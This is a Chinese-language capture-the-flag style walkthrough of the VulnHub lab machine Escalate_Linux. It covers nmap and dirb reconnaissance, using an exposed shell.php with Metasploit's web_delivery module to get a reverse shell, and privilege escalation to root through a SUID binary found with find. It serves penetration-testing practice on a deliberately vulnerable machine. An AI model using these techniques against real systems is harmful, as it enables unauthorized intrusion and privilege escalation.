靶机下载地址:Escalate_Linux: 1 ~ VulnHub
靶机简介:Escalate_Linux - 有意开发的易受攻击的 Linux 虚拟机。这台机器的主要重点是学习Linux 利用后(权限提升)技术
一、信息收集
扫描局域网内存活的主机
nmap -sP 192.168.43.0/24
![](https://i-blog.csdnimg.cn/blog_migrate/09cf8acf402ea53388600d2333e72c11.png)
![](https://i-blog.csdnimg.cn/blog_migrate/5a4cfe946b599ac142a4104f468d7fed.png)
发现靶机开启http服务,我们尝试进入一下
![](https://i-blog.csdnimg.cn/blog_migrate/e0b602cc9dbf3d76a1ddfee321bb33b6.png)
进入发现默认Apache界面,我们扫描一下网站后台php文件
dirb http://192.168.43.229/ -X .php
![](https://i-blog.csdnimg.cn/blog_migrate/c8583016da231a45eb7056eee131ab8e.png)
发现网站后台有一个shell.php文件,我们进入一下
![](https://i-blog.csdnimg.cn/blog_migrate/7a5f8af4171abe9ce0e44d470f3f1c78.png)
提示使用一下cmd命令
![](https://i-blog.csdnimg.cn/blog_migrate/64bddafa6bf8491e0f0ec3fde550f397.png)
二、渗透测试
1.打开msfconsole漏洞测试平台
![](https://i-blog.csdnimg.cn/blog_migrate/2f5ddd0639ffa0df56e1c0384f4c1882.png)
2.搜索web_delivery漏洞攻击模块
search web_delivery
![](https://i-blog.csdnimg.cn/blog_migrate/77b639c2b6625c91879440decfa601bd.png)
3.使用exploit/multi/script/web_delivery模块
use exploit/multi/script/web_delivery
![](https://i-blog.csdnimg.cn/blog_migrate/97cd61cfb585f51b6a79b78b2af794cc.png)
4.查看需配置的参数
show options
![](https://i-blog.csdnimg.cn/blog_migrate/e118e91dfe0a467a840b2f0356a783a1.png)
5.我们将目标地址和本地地址都设为攻击机IP,进行反弹shell
![](https://i-blog.csdnimg.cn/blog_migrate/aa96c96c9adada8e36e8f4cb79ea78bd.png)
6.运行
run
![](https://i-blog.csdnimg.cn/blog_migrate/91d9d4bd3e11ec36b6167df19a1c68cc.png)
我们将这段代码放进burpsuite 中进行url编码
![](https://i-blog.csdnimg.cn/blog_migrate/16b5c29fb01a5a4a39d144889c97a2f4.png)
复制出下面的编码放进网站url中执行
sessions -i 1
![](https://i-blog.csdnimg.cn/blog_migrate/e86a428909e1a2c9809c1959d21c3ccc.png)
![](https://i-blog.csdnimg.cn/blog_migrate/f8ee7b9796481c223448cbcefe0f65c8.png)
![](https://i-blog.csdnimg.cn/blog_migrate/749b8c5276d3ee309d5280b1fcc057d5.png)
成功拿到shell,我们现在是user用户尝试提权为root
我们使用python实现交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
![](https://i-blog.csdnimg.cn/blog_migrate/15c947f42c8630ecf41ec5f0c0b98d5f.png)
查找执行SUID命令
find / -perm -u=s -type f 2>/dev/null
![](https://i-blog.csdnimg.cn/blog_migrate/130620360c382c6c23b7874443fb7f4b.png)
发现user3下有个shell,我们运行测试一下
![](https://i-blog.csdnimg.cn/blog_migrate/2b1e099fd05e1cec04eed9093be2b2ac.png)
提权成功